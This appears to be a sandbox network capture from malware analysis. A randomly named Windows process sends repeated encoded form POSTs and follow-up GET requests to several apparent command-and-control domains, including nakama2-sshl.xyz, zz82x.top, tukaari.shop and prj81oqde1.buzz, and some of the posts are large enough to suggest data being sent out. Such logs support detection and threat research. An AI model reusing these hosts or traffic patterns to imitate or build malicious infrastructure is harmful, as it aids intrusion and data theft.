User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:20:09.135030985 CEST | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 09 Oct 2024 12:20:09 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49631 | 183.181.83.131 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:20:14.708749056 CEST | 731 | OUT | POST /ui3j/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.nakama2-sshl.xyz
Origin: http://www.nakama2-sshl.xyz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
Referer: http://www.nakama2-sshl.xyz/ui3j/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=Jx2AzDIVkhjYaai5rFcz6YFT60b3JX7L9vroXOaspEL0SgbThyN4jwr12EkjPO+QC6bTrGWgW7T9em1MeE9b0uXD+XEURZEaAMkQFkhJvYTnR/rZADRAfB1d0+sQW4lJENHAVbWdYQHeFW8DTk/CcF1Lf5bIw/M7z0TVIwbb5KlWL8YDQiPEJOi/TYGJ+eI2yQ==
Oct 9, 2024 14:20:15.573736906 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 09 Oct 2024 12:20:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    14 | 192.168.2.4 | 49633 | 183.181.83.131 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:17.256243944 CEST | 751 | OUT | POST /ui3j/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Origin: http://www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 76 30 53 43 44 54 69 33 68 34 69 77 72 31 69 55 6b 36 42 75 2b 62 43 36 47 75 72 47 71 67 57 34 76 39 65 6a 5a 4d 65 58 6c 59 37 65 58 42 34 58 45 57 53 70 45 61 41 4d 6b 51 46 6b 45 55 76 59 4c 6e 52 50 37 5a 42 69 52 44 44 78 31 43 7a 2b 73 51 53 34 6c 46 45 4e 48 69 56 61 36 6e 59 56 4c 65 46 57 73 44 54 32 58 42 4a 31 31 4a 52 5a 61 6e 38 66 6c 32 7a 33 36 35 50 7a 33 55 2f 4b 52 4f 44 61 4a 5a 42 54 75 54 62 4f 47 4d 4f 66 50 39 7a 64 31 2f 70 66 2f 72 67 36 72 52 36 57 62 61 31 73 4c 6f 64 75 50 4c 31 41 55 3d
                                                                                                                    Data Ascii: AHkx=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2v0SCDTi3h4iwr1iUk6Bu+bC6GurGqgW4v9ejZMeXlY7eXB4XEWSpEaAMkQFkEUvYLnRP7ZBiRDDx1Cz+sQS4lFENHiVa6nYVLeFWsDT2XBJ11JRZan8fl2z365Pz3U/KRODaJZBTuTbOGMOfP9zd1/pf/rg6rR6Wba1sLoduPL1AU=
                                                                                                                    Oct 9, 2024 14:20:18.095438957 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:17 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    15 | 192.168.2.4 | 49634 | 183.181.83.131 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:20.435024023 CEST | 10833 | OUT | POST /ui3j/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Origin: http://www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 6e 30 53 7a 6a 54 68 51 56 34 7a 41 72 31 68 55 6b 6e 42 75 2b 43 43 36 66 6c 72 47 6e 56 57 2b 72 39 4d 78 52 4d 4b 32 6c 59 67 75 58 42 31 33 45 54 52 5a 46 61 41 4d 30 55 46 6b 30 55 76 59 4c 6e 52 4a 66 5a 47 7a 52 44 42 78 31 64 30 2b 74 43 57 34 6b 51 45 4e 66 59 56 61 4f 33 5a 6d 44 65 46 79 77 44 53 43 33 42 4c 56 31 58 57 5a 61 2f 38 66 34 32 7a 33 6d 44 50 79 43 35 2f 4a 4e 4f 48 39 45 50 65 69 2b 79 5a 76 76 66 4e 2b 76 68 33 2f 55 7a 75 73 4f 66 78 49 37 74 6b 31 66 53 33 65 7a 68 47 4f 4c 66 73 55 68 51 47 4c 31 44 36 62 2f 49 33 50 4b 32 44 2b 73 30 48 46 2b 43 68 69 65 58 6c 4f 33 72 45 61 59 68 45 73 76 4a 66 76 5a 58 4f 31 51 33 72 56 76 7a 50 41 45 31 6c 2f 4e 34 53 41 6c 4b 30 61 68 68 69 36 6a 30 72 4f 54 51 59 77 4e 6a 70 39 68 64 48 2b 72 44 2f 75 51 6a 47 36 46 57 79 68 2f 4e 6a 38 6f 55 34 4b 30 37 38 52 38 64 31 65 35 6d 2b 66 42 31 31 [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:20:21.448035002 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:21 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    16 | 192.168.2.4 | 49635 | 183.181.83.131 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:22.968514919 CEST | 466 | OUT | GET /ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:23.842288971 CEST | 470 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:23 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://nakama2-sshl.xyz/ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    17 | 192.168.2.4 | 49636 | 38.47.232.196 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:29.086210966 CEST | 710 | OUT | POST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 41 36 4d 74 5a 45 75 36 32 57 4a 6e 61 62 6a 4d 6f 31 31 71 77 48 30 2f 57 70 69 35 74 4e 70 4d 35 5a 70 39 31 6e 4d 42 62 70 77 55 6b 77 67 48 77 4f 36 68 38 39 55 4e 56 72 72 74 46 6e 51 42 68 4e 36 74 78 4d 34 51 58 31 6d 4f 79 49 51 38 31 56 49 59 74 52 48 64 6f 42 5a 6f 5a 67 75 4d 43 39 76 46 67 45 50 50 6d 67 74 69 39 41 54 34 78 30 45 35 4f 76 69 79 5a 4f 69 2f 67 2b 39 5a 49 38 37 42 6c 5a 4c 4b 59 32 6c 65 2f 6e 4b 66 46 4f 66 72 6f 51 31 52 77 63 34 49 7a 6d 65 6e 48 6d 6b 30 67 45 4c 54 70 2f 65 74 61 44 55 34 6d 38 45 74 43 41 3d 3d
                                                                                                                    Data Ascii: AHkx=TFWyNNewSMoxA6MtZEu62WJnabjMo11qwH0/Wpi5tNpM5Zp91nMBbpwUkwgHwO6h89UNVrrtFnQBhN6txM4QX1mOyIQ81VIYtRHdoBZoZguMC9vFgEPPmgti9AT4x0E5OviyZOi/g+9ZI87BlZLKY2le/nKfFOfroQ1Rwc4IzmenHmk0gELTp/etaDU4m8EtCA==
                                                                                                                    Oct 9, 2024 14:20:29.999377966 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    18 | 192.168.2.4 | 49637 | 38.47.232.196 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:31.630476952 CEST | 730 | OUT | POST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uNM44Z9nWMBepwU9Agev+6q89YFVuTtFnUBhMKtx/gfUFmM7oR6xVIYtRHdoB9CZgGMCMfFyWnMqAtt4AT47kE9OvjVZLDYg81ZI8rBlM3JCmlYz3KLMOO+hREx4ugKwFifGg1ux1qE7/6eHEdMr/5kZJluDWIFV1L+6+QPZSKBA+s=
                                                                                                                    Oct 9, 2024 14:20:32.511900902 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    19 | 192.168.2.4 | 49638 | 38.47.232.196 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:34.176024914 CEST | 10812 | OUT | POST /ak5l/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Origin: http://www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.zz82x.top/ak5l/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx= [TRUNCATED]
                                                                                                                    Oct 9, 2024 14:20:35.111148119 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    20 | 192.168.2.4 | 49639 | 38.47.232.196 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:36.716541052 CEST | 459 | OUT | GET /ak5l/?rf-LZ=JlCtuN3HqPO8C&AHkx=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.zz82x.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:37.626393080 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    21 | 192.168.2.4 | 49640 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:42.678286076 CEST | 719 | OUT | POST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3iw7/dcpefSou3q62VDeDM0J1Kvl3dGxqPKMaaL86k/QQc4f9jJuaDnF5AxevglrRvcVQnGU+jf3BO6IpX5WWQO+0/gr99ZppnKMAEzVNgONq3M7aPNtD6Ynaf1ZZ66MIpxEbzK7EBass4QmCJvlcoULVHMNaFQisKqzAKyDflWBGBEQbdlzDQ==


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    22 | 192.168.2.4 | 49641 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:45.223704100 CEST | 739 | OUT | POST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vixpu6MdbL8vk/Qb85b5jIiaD6l5B9evmJrRtEVRQ6V/zf1Y+6K0H5WWQO+0/0F99BpuX6MBlzSRQOC8HM7M/NhD6YJaepzZ4yMIs1EanW4dxauo4RDCpupQq9mLVhrYxgvtM7pR7TUNlyybGNkWeY6YZn5qaxO/qRTtD9CcVeDPOY=


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    23 | 192.168.2.4 | 49642 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:47.767743111 CEST | 10821 | OUT | POST /b8ih/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Origin: http://www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.tukaari.shop/b8ih/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vqxqYuMb5j8pU/QY85Y5jIvaDip5Bg8vl9rDeMVYB6V2zf1FO6PpX55WQei0/kF99BpuUiMIUzSCAONq3M3aPNND6A/aedJZISMIMlEdU+4Uxagv4RhCpjrQqhELRgOY2QvuZSMJaT8U0epNklmQuMsZpbtmoFUk7BArhBLYwKwNLmR3I2jyyGxPcUJ6YYf95gEDIydsWF7cp0/KOMTrzUHvWPqGxH3Wr+OevAEAnLz4jv0s+zSuMmjIPnXKVoeC/u7IdYUkt31k9FJIPBn/WbgQdxtDnq2+gYK06o8Dhcea13Bph9jISQua+/9/8tQGFcdyu24qbevxLkeupA8ztC3oX1Vj+nDse7hU84Vjwu5Lm6V25qECS5OwJY8M/Nh7A3bqsYzhpKtW81l6MoJJzwlb7fme4FbS9XsCT7ndgySHe43UiU8VgsdbBtbh5Og14AL0sWRrgn9Lx7EjrcBORHaKgdcetsMHLy3zxlNt98rB753SKKyGZDRtb+z1GhsEmMRR4lphERVwPVDKoxGi4R6bYBQP6w1G0mYj5fdGCKndw9WmN6vJQxrANya5Wrco5kcf22WZxv8r+3eiNX+4LOovKohPg4cS+K6qoSqDfNIFwA2CQlwzdP0b/5hVsF7YcYxTYapu6/lmuER2Et65eXXFWBfQMUHeCrpKIVexlZ9rYg9LmDWZKr6GvjRbWGTfGrBGKv31OcOncNYhHg6HwP+/aZifWAIzJQIFWxxZjGiJNrlENskmJ1mkc4iFkrjV7jQ5e5oUcf0mj79UkCDABzX3v8Eee4RO/q7K7P7HyHy1SbOsK1GYbSe/3bKDLq/fkaEc5QfVOtJsyg0igdSxxQPT+16bswI1LEgaBnhp6nGPJ24WqL5XCShlN1+bo2XrdV9xxfwolTgFPRlZoGIiLGEnztAmxYTTGG+ewS/XFO/h0GhguHM134Wef7hxlVwWujTL4s [TRUNCATED]


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    24 | 192.168.2.4 | 49643 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:50.311779976 CEST | 462 | OUT | GET /b8ih/?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.tukaari.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:51.716342926 CEST | 400 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:51 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 260
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    25 | 192.168.2.4 | 49644 | 154.212.219.2 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    Oct 9, 2024 14:20:57.223153114 CEST | 728 | OUT | POST /6wpo/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.prj81oqde1.buzz
                                                                                                                    Origin: http://www.prj81oqde1.buzz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.prj81oqde1.buzz/6wpo/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
